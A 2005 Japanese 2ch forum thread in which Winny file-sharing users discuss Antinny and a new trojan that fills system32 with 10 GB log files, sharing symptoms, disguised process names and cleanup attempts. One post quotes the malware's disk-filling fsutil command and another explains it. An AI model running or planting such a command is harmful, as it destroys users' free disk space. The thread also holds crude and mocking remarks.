Winnyを狙ったワーム・ニュイルス情報 Part34

なんかノートン先生が検出しないキンタマﾊｯｹｿ('A`)
2004で最新ﾊﾟｯﾁまで当ててるんだが何故だ。新亜種？
2005もインストしてないが持ってるけど新種だったら意味ないから当面様子見

system32に10GBのupdate001.logが作られる。
再起動すると消したはずのupdate001.logが元に戻り、
新たにupdate002.logが作られる…　nortonは反応せず。

お、新種か？

>>387

下の325と同じだね。

ウィルス情報＆質問　総合スレッド☆Part28
http://pc5.2ch.net/test/read.cgi/sec/1108718666/

新種というより、ただのトロイであって
先生が検知しないブツはnyに限らず各所に転がってる
nyを狙ったというのは、感染後nyに撒くとか、なんかその手のブツに
対して使うべきではないの？

10Gもあったら俺の40GしかないHDDはパンクする

>>390
もともとはnyで流れてたのを誰かがうpろだにうｐしたみたい。

>>381
avast! 4

マイドキュメントのデータを消したり流したりするウイルスが
あるらしいけど、そのため、マイドキュメントを使用してない人は、
mp3,画像データ,その他、などのデータ類を、どう保存や管理して
るの？

>>394
好きなところに保存すればいいじゃん。
つか、お仕着せのマイドキュメントなんてこわくて使えない。

ソース管理者の人、聞きました？
マイドキュメントだけが危険だと信じてる人達がいる今がチャンスですよ

おｋ

まあ、結局何処にあるか分からないからマイドキュ消すのが一番

アホばっか

入れなおすのが一番

カモばっか

ばっかって言う奴がばっか

>>386
ライブアップデートが当たっている限り、マルウェアで検出できないことはない
と公言していたとオモタ。

>>396

お前、馬鹿すぎ、なんでマイドキュメントだけのわけないだろ、
どう読んだらそうなるんだよｗ

なんでマイドキュメントだけのわけないだろ

↑文章がおかしくね？

∧＿∧
( ´･ω･) みなさん、お茶でも飲んでもちついて・・・・。
( つ旦O
と＿)＿) 旦旦旦旦旦旦旦旦旦旦旦旦旦旦旦旦旦旦旦旦

>>403
ライブは完璧なはず。ウイルス定義は3/3日付け。
exeクリックで感染した。感染する前も後もスキャンで無反応。
一日様子見てみたがこれに関しては話題でないね
俺のはupdate001.logがどうのこうのじゃなくて、症状は普通にキンタマ。

しょうがないからレジストいじって駆除はしたが、気持ち悪いな･･･
先生がバグってるかはないと思うんだけどな
まあ俺だけっぽいから消えとくわﾉｼ

マイドキュメントが狙われるっていうから
始めて中身覗いたが意味不明な画像が入ってた
これがうわさのキンタマとかいう奴か? ｶﾞｸｶﾞｸ(((；ﾟДﾟ)))ﾌﾞﾙﾌﾞﾙ

http://www.kitanet.ne.jp/~cas-per/cgi-bin/img-box/img20050304185503.jpg

ｸｿﾜﾗﾀ

update　無限に増えるんですが
リカバリと復元以外の対処法教えてくだふぁい(´・д・｀)

意味不明だと思うひと、挙手願いまつ。

つ

つ

>>387
のこと

>>414
＞リカバリと復元以外の対処法教えてくだふぁい

ノートンが反応しないような新作を、一般人に対処法がわかると思うかい？
おとなしくリカバリ汁！
その前にシマンテックにウイルス検体提出しといてね

うっはだるいな。エロ動画とか映画とか消せねえよ。。。
別に消し続けてたらめんどいけど害はないし
対処法が出るまで我慢するかな・・・

レジストリいじって直るなら誰かうｐきぼんぬ

>>416
新種なんだからレジのどこか分かる訳ねーべ

>>416
新種なんだから無害かどうか分かる訳ねーべ

後で泣く前にリカバリしておくほうが良いと思うんだがな。

>>416
何をどうしたら、>>387の症状になったの？

>>416
「うっはだるいな」なんて言ってるって事は、バックアップも取ってないトウシロウだなｗ

素人判断で弄って「これで大丈夫かな？」なんてハラハラするくらいならリカバリしたほうが精神的にもGood！
宣伝するわけじゃないが、下のようなToolを使えば復旧なんて30分以内に完了する
日頃から準備を怠らなければウイルスやシステムクラッシュなんてどうって事ない
「転んでも泣かない」のが2chのお約束ですよ

ttp://www.symantec.com/region/jp/products/ghost/
ttp://www1.ark-info-sys.co.jp/products/products_pc/backup/

【症状】WINDOWS￥system32内に15分おきに10Gのupdatexxx.logファイルを作成。
　　　　 画像うpなど、他にもあるかも？
【対象OS】Windows XP
【感染原因】winny及びアップローダー上の少年誌連載漫画のスキャン画像フォルダに
　　　　　　　 偽装したexeファイルを実行することにより発症。
【その他】fsutil.exeが関係？
　　　　　　今のところ、ウイルススキャンには反応せず。
　　　　　　システムの復元でファイルの増殖は止まったとの報告あり。（ダメな人もいた。）

ハッシュとか何か手がかりになることはわからんのん？

偽）svc[２バイト文字]host.exe
本）svchost.exe

*重複してることと、実行した時間体にできたもの。

レジストリ
C:\WINDOWS\System32\svc[２バイト文字]host.exe
になってるから
C:\WINDOWS\System32\svchost.exe
に直せばいいんじゃないかな。
詳しくないからわからん。

HDDを圧迫するexeは容量１０G以下のPCだと
なにもおこらないっぽい。

ctFmon.exe
ime\imejp\imejpmIg.exe
dlLhost.exe
svcHost.exe

…かもです
ふたつめはご丁寧にディレクトリ掘って格納するらしい

プログラムgomiplus2 を特定しますた…やっと
fsutil filecreate new %windir%\system32\updateXXX.log 10737418240
を実行するらしい もうちょっと調べてみるっす…

直らない。・・・
svchostも２バイト文字じゃないけど２個ある
他は異常なし。
プログラムgomiplus2 を特定しますた…やっと
fsutil filecreate new %windir%\system32\updateXXX.log 10737418240
は意味が分からん
復元は回避したい
システムの復元をするとマイドキュメントの中身が消えた。
別の手を考えようとあれこれ試したがsvchostやdllhostに触っただけで
また１０Ｇのテキストが出来てる。
プログラムgomiplus2 は特定できなかった。
結局はシステムの復元をしたほうがいいと思う。
しかしマイドキュメントの中身が消えるのでバックアップで
ファイルの復元をしないといけない。
それでも全部は戻らないのであらかじめマイドキュメントの中をすべて
新しいフォルダにコピーしておき別の場所に保管しておくことを薦める。
復元で消えたドキュメントファイルをコピーするか移動させればいい。
怖いのは、あれこれ試したのがいけなかったか？時間をかけたのが悪かったか？
やればやるほどマイドキュメントが消えていくんだ。
自分の場合は最終的にマイドキュメント丸ごと全部と
その他のフリーソフト（少なくても３種類）まで消えてしまった。
どれもずっと前にダウンロードしたものなので１週間くらい復元でさかのぼっても
消えるはずのないソフトだったのに・・・・。
専用ブラウザが消えたので今はＩＥから書いているほどだ。
とりあえずシステムの復元によってsvchostやdllhostは消えたようなので
しばらくはこのまま様子見する。
まだ他にも影響が出ているかもしれない。

「fsutil」はどうも2000/XP系で標準のユーティリティコマンドっぽいな。

fsutil　　　　　　　　　　　　　　　　　　　　ユーティリティ指定
file　　　　　　　　　　　　　　　　　　　　　　コマンド
createnew　　　　　　　　　　　　　　　　　「ファイルを新規作成する」オプション
%windir%\system32\updateXXX.log 　作成するファイルのパスおよびファイル名を指定
10737418240　　　　　　　　　　　　　　　作成するファイルのサイズを指定

だから、%windir%変数下のsystem32フォルダに
10737418240バイトのサイズでupdateXXX.logファイルを作成しろってコマンドを実行してるわけだ。

ttp://www.atmarkit.co.jp/fwin2k/win2ktips/243largefile/largefile.html

＞どれもずっと前にダウンロードしたものなので１週間くらい復元でさかのぼっても
消えるはずのないソフトだったのに・・・・。


おまえ復元が分かってないだろ

PC初心者行った方がいい奴多すぎ

だからカモられる

多い？少ない？ 3人に1人はインターネット「上級者」

・インターネットコム株式会社 と 株式会社インフォプラント による、利用歴
　3年以上のインターネットユーザーへ対する調査によると、自分は「インター
　ネット上級者」だと思うと答えたユーザーは合わせて33.4％だった。

　調査対象は全国20代〜50代の利用歴3年以上のインターネットユーザー
　300人。 年齢層は20代27.7％、30代40.0％、40代25.3％、50代7.0％。男女別
　構成比は男性42.3％、女性57.7％。

女でPC詳しい奴なんてリアルで見た事ないな…

>>431
自称上級者多すぎｗｗｗ
つか上級者ってなんだよｗｗｗ

>175
SMTP用のポート25をnyに割り当てた相手の問題でこっちは関係ないってことか。
俺も2回ほど同じことあったからウイルス喰らったかと思った。
でもこっちの送信元ポートがnyに割り当てた番号じゃないのが気になるが。

>>434
>でもこっちの送信元ポートがnyに割り当てた番号じゃないのが気になるが。

そりは総合質問スレのテンプレ22−FWの設定の仕方−に考えるヒントがあるべさ。

バックアップ所か、２日前買ったPCなんでね。
相当Winnyで落としまくったし、ブックマークも終えたし、ウイルスバスターも入れたのになぁ。
これからバックアップとるぞって矢先になったんで。
さっさと駆除できるようにうｐデート汁！

>>432
俺のバイト先では音楽CD焼くなら誘電、アゾが、ジッターがどうのこうのやら
助言を教えてくれた女子がいました

>>436
まずは購入直後の状態のイメージをとるのが俺の基本。
だって万が一の時でも、リカバリするよりイメージ復元の方が早いもの。

まぁ2日ならまだダメージ浅いだろ。
授業料として甘受するのだな

トレンドマイクロオンラインスキャンで、15のウィルス感染が報告。
WORM_ANTINNY.ｌが10個
WORM_ANTINNY.Aが3個
WORM_ANTINNY.GとWORM_ANTINNY.Bがともに１個
しかし感染ファイルが読めません(C\RESTORE\TEN....となり省略部が読めない)
このファイルの検索法と駆除法を教えてください。お願いします。
【使用OS】 ME
【WindowsUpdateしてるか】 はい
【使用AntiVirusソフト】 なし
【Winnyのﾊﾞｰｼﾞｮﾝ】 2b7.1
【Winny歴、総DL量】 １年くらい　総DL　多分50GBくらい
【テンプレを読んだか】 はい
【テンプレにある対策を実行したか】 ↓にまとめて
【症状、具体的に分かる限りすべて書く】 ↓にまとめて
【何をしたらそんなことになったのか】
過去に感染したことがありその時は対処したが、今回はexeファイルに細心の注意をはらっていたつもりだし実行した記憶もないのにいつの間にか感染していて焦ってます。
exe検索してもフォルダのやつは出てこないし(解凍時に出てきたことはあったが即ゴミ箱で捨ててます)、感染ファイルを持っているだけなのかそのウィルスが実行されてるのかとかもよく分からないんです。
正直言って今の自分のPCが危険な状態なのか、その手前なのかも分かっていない状態です。ごめんなさい。

>>439
そういうのは
セキュリティ初心者質問スレッドpart52
http://pc5.2ch.net/test/read.cgi/sec/1108260790/
こっちで聞いてくれ

>>440
失礼致しました。

ANTINNYなんて自業自得なもん、端から相手にされないんじゃないの？

＞【使用AntiVirusソフト】 なし
＞exeファイルに細心の注意をはらっていたつもりだし
＞実行した記憶もないのに　

論外。ウィルス上等わが道をゆく主義なら，最後までオレ流を貫け。
第一、削除したってすぐに再感染するに違いないから無駄手間。
>>442 セキュ板でも誰も相手しませんよ。ny厨ｶｴﾚで終いですよw

439です。
向こうでもおっしゃるとおりの反応をされました。
確かに自業自得ですね。。。
自分のけつは自分で拭くことにします。

というわけで、ドキドキの初OS再インストに向けてこれから下調べと下準備に取り掛かります！
それでは！　がおーーー！きあいだー！

システム復元で何とか増殖はとまった。
このPC一日おきに記録してて助かったよ。

で、問題ｳｨﾙｽに対応するようになるのはいつ頃だ？

>>446
作り手側のことも少しは考えてくれ。
そんなに早く対応されたら正直やってられんよッ！

ｳｨﾙｽ対策ソフトを無料にしてくれたら文句は言わないがな

ウィルスソフトの会社が自演でウィルス作ってるの？

>449
日々大量のウイルスが世界中で造られているというのに
余計な人件費を使う必要があるのか考えてみたのかよ

>>449
ウソ

「うん」なのか「うそ」なのか・・・悶々と悩んでいるｵﾚorz

つーか「ウィルスソフト」の会社なら作ってるだろーな
会社組織でやってるかどーかは知らんが

ウィルス対策ソフトの会社ならそんなヒマも金も無いだろ
まぁ其処の社員が個人的に何かやってる可能性は否定しきれんがな

そーいや、サッサー作った高校生の少年は今頃どうしてんだろ
ヘッドハンティングされてんのかね

捨てる菌ありゃ拾う菌あり

バスター使用ですがイメージファイル形式までスキャンしてくれないようです。
イメージファイルをきちんとスキャンできるセキュソフトでお勧めなのがあったらよかったら教えてください。
スレ違いですみません。。

>>456
すれ違いの上にマルチとは救いようがないな。

【cool】BitDefender Free Edition 4【free】
ttp://pc5.2ch.net/test/read.cgi/sec/1103213501/l50

やると思った。

>>449
JAS○ACだったりして??

ビックカメラで、アンチウイルスソフトを購入しようと入ったら
ノートンとトレンドマイクロがあって、そのノートンの店員に
超えかけられてノートンをすすめられ、今度はトレンドマイクロの店員
にも声かけられて、おすすめされて、もうわけわかんなくなった。

ウイルスバスター2005を購入したけど、ウイルスを検出してくれません。
ソフトウエアの中にマイクロソフト製のウイルスがあるのですが?

　　そんな釣りで俺様がクマーー！！　　　　　　,,_
＼ 　　　　　　　　　　　　　　　　　　　　　　　　　r'o p。｀、
　 ＼　　　　　　　　　　　　　　　　　　　　　　　　l　 ,．- ､ヾ　　　　　　 r'　｀ｰ- 、
　　　＼ 　　　　　　　　　　　　　　　　　　　　　　l　'-‐‐-' ,'　　　　　　　' ,　　 .;;.｀l
　　　　 ＼　　　　　　　　　　　　　　　　　　　　　',　　　　j　　　　　　　　 ,i' ,,　 ''　l
　　　　　　＼ 　　　　　　　　　　　　　　　　　　　 〉　　　 k　　　　　　　, '　　　　 ,ﾉ
　　　　　　　 ＼　　　　　　　　　　　　　　　　 　 ,'　　　　 ',　　　　　 , '　　　　　,'
　　　　　　　　　＼ 　　　　　　　　　　　　　　　7　　　　 　l　　　　 , '　　　　　 ,'
　　　　　　　　　　 ＼　　　　　　　　　　　　　 ,'　　　　　　,'　　　 , '　　　　　　,'
　　　　　　　　　　　　＼ 　　,,　,．-‐--．,,__ ,'　　　　　, ,　' 、　 ,'　　 　 　 　 ,'
　　　　　　　　　　　　　 ＼r''"´　　　　　　,　 ｀　　　'"　　　　｀'、　　　　　　 ,'
　　　　　　　　　　　　　 （´⌒qヽ　　　　, '　　　　　　　　　　　　　　　　　　　,'
　　　　　　　　　　　　　 　 ,､n_ﾉ　　　 , '　　_r-‐- 、　　　　　　　　　　　　　l'
　　　　　　　　　　　　　　　' 、　 　 _, ' ., r-' _,-‐q　i　　　　　　　　　　　　　,'
　　　　　　　　　　　　,．‐-､_,,ソｰ'´　　,　;　､_γ　　ｌ　　　　　　 , 　　　　　,'
　　　　　　　　　　r‐'´ｇ ri　::　　　　　,'　　'、　 ｒ_,　 'l　　　　 :´　｀ヾ　　 ,.'
　　　　　　　　　　｀､ r,　i |　:　　　　　' , 　 ｀ 、　　　j　　　　 ' 　 　 　 , '
　　　　　　　　　　　ｔ､o_ tj ::　　　　　　 ' ,　　､｀ｰ--,'.:　　　　　　　　_,ノ
　　　　　　　　　　　　｀ｰ-‐'´　｀ｰ----‐'"｀ｰ､｀____;'-、　　　　　,-'
　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　 ｀゛"''''''"

ああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああ

>>461
お前バスター君に給料払ってないだろ

>>464
ちゃんと毎日パターンUPしたり、検索エンジンもアップデートしたりしてます。
ん〜どうして僕のPCにはウイルスが居ないのでしょうか?

シャイなんだよ。

ウブなんだよ。

お願いします

>>468
再インスコ、以上。

【使用OS】 WinXP home SP2
【WindowsUpdateしてるか】 している
【使用AntiVirusソフト】 ウィルスバスター2005
【AntiVirusをUpdateしてるか】 している
【ウイルススキャンの結果】 ウィルスなし
【オンラインスキャンしたなら結果】 ウィルスなし
【Winnyのﾊﾞｰｼﾞｮﾝ】 V.6b66
【Winny歴、総DL量】 3ヶ月　20GBぐらい
【テンプレを読んだか】 よんだ
【テンプレにある対策を実行したか】 該当なし
【症状、具体的に分かる限りすべて書く】 スタートボタン→終了オプション→電源を切る→電源OFF→自動的に再起動
【何をしたらそんなことになったのか】 winny接続6時間
【これまでにとった措置】ウィルスチェック、スパイウェアチェック、スキャンディスク、チェックディスク、fixboot、fixmbr（回復コンソール）
再インスコしかないんでしょうか・・・・

呪われてるんじゃねーの？

<470
アホみたいな話だが、終了オプションで「再起動」にチェックが入ってるとかは？
とりあえずアンチニーの仕業ではないと思う。

>470
Hard側かもよ。変な周辺デバイスが動いてないか？
つか、何でもかんでもﾆｭｲﾙｽのせいにするなよ。

確実に終了選んでますし、
周辺デバイスは動いてないです。
今までは正常に使えていたんで・・・

余所のnyが接続に来たのを感知して起動してるんじゃねーの？
PC落としたらLANケーブルも抜いとけ

>>475
しばらくそれで対応してみます。

BIOSのWakeupLanを切る

決め打ちでMagicPacket送信して、WakeupLANから起動させてる
としたら、たいしたもんだな。正直ガクブルもんだ。(((( ；ﾟДﾟ)))

日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。

>>479
っで

>>479の落ちてこないんだけど(´･ω･｀)

>>479
対処法とかはありますか？

>>470
自作機？
ツレのPCも勝手に起ち上がる事があったんだけど
その時の原因はマザーボードとケースの短絡だった。
アースがきっちり取れてなかったのと、マザーの取り付けの
時に、間に絶縁シート（赤い丸いヤツ）挟んで無かったため。
電源やマザーのコンデンサとかが劣化したらなるのかな？
最後の方は、ケースの横面をコツンと叩くだけで電源が入って
それはそれで便利だったそうだ （ｗ

>>482
電源消しても、しばらく勝手に起動する現象の事かな？
それはメーカー製のPCによくあることなんだけど、
解決法はあるんだけど、もし質問の内容がそうじゃなかったら
悪いので・・・。

板違いの話を延々とやられる方が迷惑だ

落ちてきた(・∀・)

>>486
既存ウイルスなら種類教えてくれ賜う。
未知ウイルスなら分離してパスロックかけてうpよろ。

ってかPandoraってﾆｭｲﾙｽばっかじゃん。
ん？だからPandoraって言うのか…。妙に納得。

教えてください、将軍様
イメージファイル形式のアプリを落として解凍
ここまででノートン氏のスキャンでは問題ないようですが
イメージをマウントした時点で発動するウィルスってあるの？

>>489
あんたからマウントとった時点で殴り出す人はいると思う

>>489
よゆう

10Gニュイルスの対処法は？まだ？

「ザクとはちがうのだよ！　ザクとは・・」

ガンダムだけであと１００年は荒稼ぎできる

>>479
アンチウイルスツールが検出するウィルス
ニュイルス（新型）じゃない

ただ先生やAVGはW32.Pinfi(Win32/Parite.A)って検出するんだけど、
実態はぬるぽテキスト型（たぶん既出）なんだよね

これは誤検出なのか、広義の亜種なのかよくわかんね
少なくとも>>337のリンクで書かれてる対処方法じゃダメなのは確か

キンタマで自分の個人情報流れてるか知る方法ないのですか？
マルチで申し訳ない。

検索する

ヒットしたら落としてみる

　[キンタマ] 俺のデスクトップ PCのユーザー名[日付]（ファイル詰め合わせ）.lzh　とかいうの落として見たいんだけど
これ自体にウイルスって入ってるのかな？

心配なら.lzhはやめておいた方がいい

>>498
>>479は違法なので捏造警告指定してあったが再キャッシュ化しといた
終わったら言ってくれ

>>500
何故ですか？

>>502
何故だろう

何故ならば

　＿＿__　　　r っ　　　 ＿＿＿＿＿＿＿＿　　　＿　__,、　　　　 　　　　　 　r っ 　 　 　 　 　 　 r っ
　|　.__　|　＿_|　|＿_　　|＿＿＿_ 　,＿＿＿_|　　,!　/ |　l´　　　 　 く｀ヽ　＿__|　|＿＿ 　 r‐――┘└‐――┐
　|　| |　|　|　__ 　__　|　　r┐ ＿__|　|＿__ r┐　 /　/　|　|　　／＼ 　 ヽ冫Ｌ＿　 ＿ 　| 　 | ┌─────┐ |
　|　|_|　| _|　|_|　|_|　|_ 　|　| |　r┐ r┐ | |　|　/ 　| 　 |　レ'´　／ 　く｀ヽ,＿＿|　|＿|　|＿ !┘|￣￣￣￣￣|‐┘
　|　r┐| |＿__　 ＿＿|.　|　| |　二　二　| |　|く_/l　| 　 |　 , ‐'´　 　　　∨|＿＿　　＿＿＿|　r‐､￣|　|￣￣
　|　|_.| |　　 /　 ヽ　　　 |　| |　|__| |__|　| |　|　　 |　|　 |　|　　　__　 　 /｀〉　　/　　＼ 　 　 　│ |　|　 ￣￣|
　|　　　|　／ /＼ ＼. 　 |　|└------┘|　|　　 |　|　 |　|＿＿|　| 　/ /　 ／ ／＼　｀- ､_　丿　＼|　|￣￣
　 ￣￣ く_／　　 ＼ ｀ﾌ |　 ￣￣￣￣￣　 |　　 |　| 　|＿＿＿_丿く　/ <´ ／　　　｀- ､_/／　ﾉ＼　　｀ｰ―--┐
　　　　　　　　　 　　 `´　｀‐'￣￣￣￣￣｀‐' 　　 ￣　　　　　　　 　 `　　　｀´　　 　 　　 　 ｀ｰ' 　　 ｀ｰ───-′

スポンサー誰だよ！

オレオレ

ホラー

しかもスプラッタ

　＿＿__　　　r っ　　　 ＿＿＿＿＿＿＿＿　　　＿　__,、　　　　　　 ＿　＿　　　　＿＿_　　＿
　|　.__　|　＿_|　|＿_　　|＿＿＿_ 　,＿＿＿_|　　,!　/ |　l´　　　　　　,!　/_|　|＿_ 　 |　　　|　 !　/＿___,、
　|　| |　|　|　__ 　__　|　　r┐ ＿__|　|＿__ r┐　 /　/　|　|　　／＼　 /　＿_　 _＿|　 |　ロ .|　/ 　 __　 __l´
　|　|_|　| _|　|_|　|_|　|_ 　|　| |　r┐ r┐ | |　|　/ 　| 　 |　レ'´　／　く_/＿__|　|＿__　.|　ロ .|く_ハ<　| |
　|　r┐| |＿__　 ＿＿|.　|　| |　二　二　| |　|く_/l　| 　 |　 , ‐'´　　　　|＿__ 　 ＿__|　|　ロ .|　　ヽヽ//
　|　|_.| |　　 /　 ヽ　　　 |　| |　|__| |__|　| |　|　　 |　|　 |　|　　　__　　　　　/　ヽ 　 　 |__　.__|　　 　} /
　|　　　|　／ /＼ ＼. 　 |　|└------┘|　|　　 |　|　 |　|＿＿|　|　　　／ /＼ ＼　　 /　ヽ　　 / ﾊヽ
　 ￣￣ く_／　　 ＼ ｀ﾌ |　 ￣￣￣￣￣　 |　　 |　| 　|＿＿＿_丿　 く_／　　 ＼ ｀ﾌく_/＼｀ﾌく／　＼｀ﾌ

やっぱりな・・・

スポンサーの俺が至らないばっかりに･･･orz

いや、スプラッタなんて企画出した俺が悪いんだ‥‥orz

>>510
対処法とかありますか？

>>514
マーケティングリサーチをしっかりやるとか
企画を充分煮詰めておくとか
予算管理をしっかりするとか
問題有りそうなスタッフやキャストは使わないとか

つか、マジで10Gウイルスどうすればいいんだ…orz

システム復元で症状はおさまったよ。
gomiplusてのがどこにあるのかは分からん。
残ってるなら消したい。

検索もできない奴がnyやるな

　　　　　　　　出　 　 部　　　こ　　　 　　　　　　　　　 　 　 ＿＿
　　　　　　　　来　 　 屋　　　の　　　　　　　　　　　　　 ／　　　　＼
　　　　　　　　る　 　 .を　　　ス　　　　　　　　　　　　　/　　ノ┼ｰ　 ヽ
　　　　　　　　だ　　　明　　　レ 　 　　　　　　　　　 　 |　　─┴─　 |
　　　　　　　　け　　　る　　　を　　　　　　　　　　　 　 ヽ　 |￣￣|　 /
　　　　　　　　遠　　　く　　　 ご　　　　　　　　　　　　　　＼ ￣￣ ／
　　　　　　　　.く　　　 し　 　 覧　　　　　　　　　　　 　 　 　 ￣￣
　　　　　　　　か　　　て　 　 に
　　　　　　　　ら　　　　｀　　 .な　　　　　　　/＼＿＿_／ヽ 　　　　 /＼＿＿_／＼
　　　　　　　　ご 　 　 　 　 　る　　　　　 ／''''''　　　'''''':::::::＼ 　 ／　⌒　　　⌒ ::: ＼
　　　　　　 　 覧　　　　　　　.時　　　　　|（●）,　　　､（●）､.:|　 |　（●）,　、（●）、　| 　
　　 　 　 　 　 く　　　　　　　 は　　　　　|　　 ,,ﾉ(､_, )ヽ､,,　.::::|　 |　　,,ノ(、_, )ヽ、,, 　 | 　
　　　　　　　　だ　　　　　　　　　　　　　　|　　 ｀-=ﾆ=- '　.:::::::|　 |　　　ト‐＝‐ｧ' 　 .::::| 　　
　　　　　　　　さ　　　　　　　　　　　　　　 ＼　　｀ﾆﾆ´　 .:::::／　 .＼　　｀ニニ´　 .:::／
　　　　　　　　い　　　　　　　　　　　　　　　 ｀ー‐--‐‐―´. 　　　　 ｀ー‐--‐‐―´´

ttp://2ch.jpn21.net/Imgboard/01/data/img20050306222509.jpg
ﾀｽｹﾃ。ﾟ(ﾟ'Д`ﾟ)ﾟ。

動揺しててageてしまったorz

>>520
寄るな。
ウイルスが遷る。

>>520
うわっ
よくそこまで放置できたなｗ

いくらなんでもネタ画像だろ

キンタマにやられてデジカメの画像とかも全部やられてしまった・・・
娘の1歳の誕生日の画像とかあったのに・・・

こんな馬鹿な父ちゃんを許しておくれ ozr

娘の1歳の誕生日の画像とか、nyで流れてる？

愛娘がペド野郎共のオカズにされるのは哀れな気もするが
まあ、晒されたっていいじゃない　泥棒だもの

大事なデータ入ったPCでnyをやること自体信じられない

>>525
ハッシュきぼんｗ

トレンドマイクロに登録されているAntinnyども。
A B C E G H J K P Q V X Y
しばらく見ない間にずいぶん増えたもんだな。YとかVとかきいたことないし。

アルファベット使い切ったら、Ωとかになるのかな

まさか2byte文字を使う事はないだろ。

A〜Z
AA〜AZ
BA〜BZ
以下同様

場合によっては制御コードが混じる2byte文字を使う訳が無い
脳は生きてる内に使っとけや

01/01
　　　　　　　 　_□
　　　　　　　　 ('A`)　 v　 (　)　(　)　(　)　(　)
　　　　　　|￣￣|ノ）　田ノ（ ）V（ ）　（ ）V（ ）
　　　　　　|￣￣￣￣￣|　| |　　| |　 | |　　| |
01/05
⊂⌒ヽ　　　　　　　　　　(⌒⊃
　　＼ ＼　　／⌒ヽ　　/　/
　⊂二二二（　＾ω＾）ニニ二⊃
　　　　　＼　＼_∩_／　／
　　　　　　（　　(::)(::)　　）
　　　　　　　ヽ＿,*､＿ノ　　ﾌﾞｰﾝ
　　　／／／
　／／／
01/06
＿[警]　
　　(　 ) (^ω^ )
　　(　 )Ｖノ ）
　　 | |　　| |
01/07
　　　　　　 　 　　　　　　＜￣☆＞　
　 　　　　　 　⊂二二二（　＾ω＾）二⊃
　　　　　　　　　　　　　　|　警　/
　　 　　　　／⌒ヽ　　　 （　ヽノ
⊂二二二（　＾ω＾）二⊃ﾉ>ノ
　　　　　|　　 　/ 　三　レﾚ
　　　　　（　ヽノ　　　　　　　　　それが人権擁護法案クオリティー
　　　　　ﾉ>ノ　　　　　　　http://that3.2ch.net/test/read.cgi/gline/1110125487/
　 三　　レﾚ

Bagleなんかのバージョン文字列は、とっくにダブル表記だな。

A列車で行こう7 マウントしたら
「ウイルスだったら　ＨＤアボーソだったぞ」
と出た。　実害はあるのかなあ？

>>536
「無い」って言ったら信じるのかい？
心配ならフォーマットしてOS再インスコしとけ

家に帰ったら
「俺が泥棒だったら金目のもの盗まれてるぞ」
っていう置き手紙があるようなものだな。
いやそれ以上か。

まぁそれで経過を見守って見るも一興

239 名前：(´Д｀) ◆maohDL64.s [sage(　ﾟДﾟ)＜ﾎﾟｶｰﾝ] 投稿日：05/02/06(日) 01:32:47 ID:2gSt18n70
つーか、そういう物は即効性が重要な訳で。
わざわざ時限式ですよなんて教えてやる必要もないのだ。
対応されちゃったら無意味な訳だし。

おいらの結論：何の心配もしなくてよし

ダウンロード板ってレベルの低さは初心者板のようなものだな。
いやそれ以上か。

俺が仕組むなら、
フォーマットを気にするようにFakeで仕向けておいて、裏でトロイ

autorunからbatファイルを実行させるタイプのやつって
CDイメージをスキャンしても検出してくれない
autorun無効にしてマウントしてスキャンしても無理。
Nortonじゃあ検出できないだけ？

裏でトロイ←もうね、（ｒｙ

>>542
batファイルを読め。
話はそれからだ。

>>542
ここで扱うニュイルス（新型）は、
基本的にNorton等のアンチウィルスツールを更新して使っていても検出されないもの

キンタマが出た時点でデスクトップ晒し上げだけでなく
キーロガー仕込んでそのログを垂れ流すような亜種も
出るだろうとか思ってたんだが未だに遭遇しない。

>>544
いや正確に言えばautorunからexeを実行させるタイプなんだよ

>>545
刷れ違い？ごめん

>>547
batファイルがテキストの従来からあるタイプなら、
対処は>>544でスレ違いだが、バイナリならスレ違いじゃないと思う

>>540
その日本語だと、ここが初心者板より上なのか下なのかよくわからんな。
まぁ文脈で初心者板よりひどいって言いたいのはわかるけど……

しかし実際は二極分化してるだけなんだけどな。
正しくは「初心者」「上級者気取り初心者≒540」「上級者」か。
あーちなみに俺も初心者に毛の生えた程度難で悪しからず。

初心者とか上級者とかそういう分類自体が滑稽でたまらん

うはｗ日本語下手ですまんｗｗｗ

上級者っていうか、ウィルス開発者レベルの人は
ROMってﾆﾔﾆﾔしてるだけだから、
書き込んでる奴は９割方素人

ウィルス開発者レベルの人は
ROMってﾆﾔﾆﾔしてるだけだから、

これを断言できる根拠は何処から沸いてくるのかと

おれ上級者だよ

おれは中級者

>>553
そんな奴が初心者の溜まり場になってるこのスレに入り込んで、
煽ったりQ&Aに参加したりすると思うか？
開発者なら煽ったりする時間があれば自前のウイルスを強化するだろ

>>556
人を嘲笑したり弄ぶのが楽しいからウィルス作ってんだろ
ウィルス作ってニヤニヤするのは初心者煽ったりするのと一緒
参加してると思うけどな。
まぁ想像の世界だし終着点は無いから何とも言えんがな

お前ら、スレ違いはその辺にしとけや

俺はもっと不思議

このスレにいる（というかたまに流れをチェックする）んだが
あー、単に状況を知りたいという好奇心かな。
ある程度の解析情報は提供するけど、最近暇がないんでVPC立てて検証するほどじゃない。

新種の動きとか、業界(?)の対策とか、P2Pの今後とかネタでもあるので
できることはするし、できないことはしない。
スキルつーか、開発できてもリスクでかいからしないなぁ。

漏れは慌てふためいてるお馬鹿達をヲチしてニヤニヤするのが日課

空しい日課ですね

質問です。
以下挙げる三回とも急にバスターが緊急ロックという動作をしたらしく
インターネットを切断され、ＰＣを再起動しなくてはならないことがあったのですが、
どういった症状なのでしょうか。
バスターのパーソナルファイヤーウォールのログに経歴が残っていたので
晒しておきます。
ログ欄には「ネットワークウイルス」となっていました。

3/4の21:41
今日の11:08
続いて15:33

と各回とも違う送信元ＩＰから来ていました。
ちなみに今日の二回ともnyも起動しており、
緊急ロックによりnyも停止していました。
（ただ初回時はnyを起動していたかどうか覚えていません）

>>563
激しくスレ違いの上に、情報が欠落し過ぎ。

だな
まずは君にお姉さんか妹がいるかどうかくらい書かないとね

この板にも春が来たか
俺にも来ないかな

繁華街に行けば売ってるから、好きなの買ってくると良いよ

で、１０Ｇウイルスはどーなったの？

>>568
これが10Gに関係あるかどうかわからないけど
今朝のノートンupdateでトロイ発見。
c:\WINDOWS\IME\IMEJPのimjpmｉg.exe駆除で10G収まった。
こいつが原因？

よそで質問したところ、こちらに案内されたので質問させてください。
いつから感染してるのか不明ですが、右クリックからワードやエクセルの
新規文書を作成すると、92kbサイズでヘンなファイルが作成されます。
中身にはAAと「ぬるぽ」と書かれてます。アンチウイルスやスパイウエア
検出等いろいろ調べたのですが、よくわからないのです。

どこかにフォルダができていたり、regeditとノートパッドが入れ替わったりと
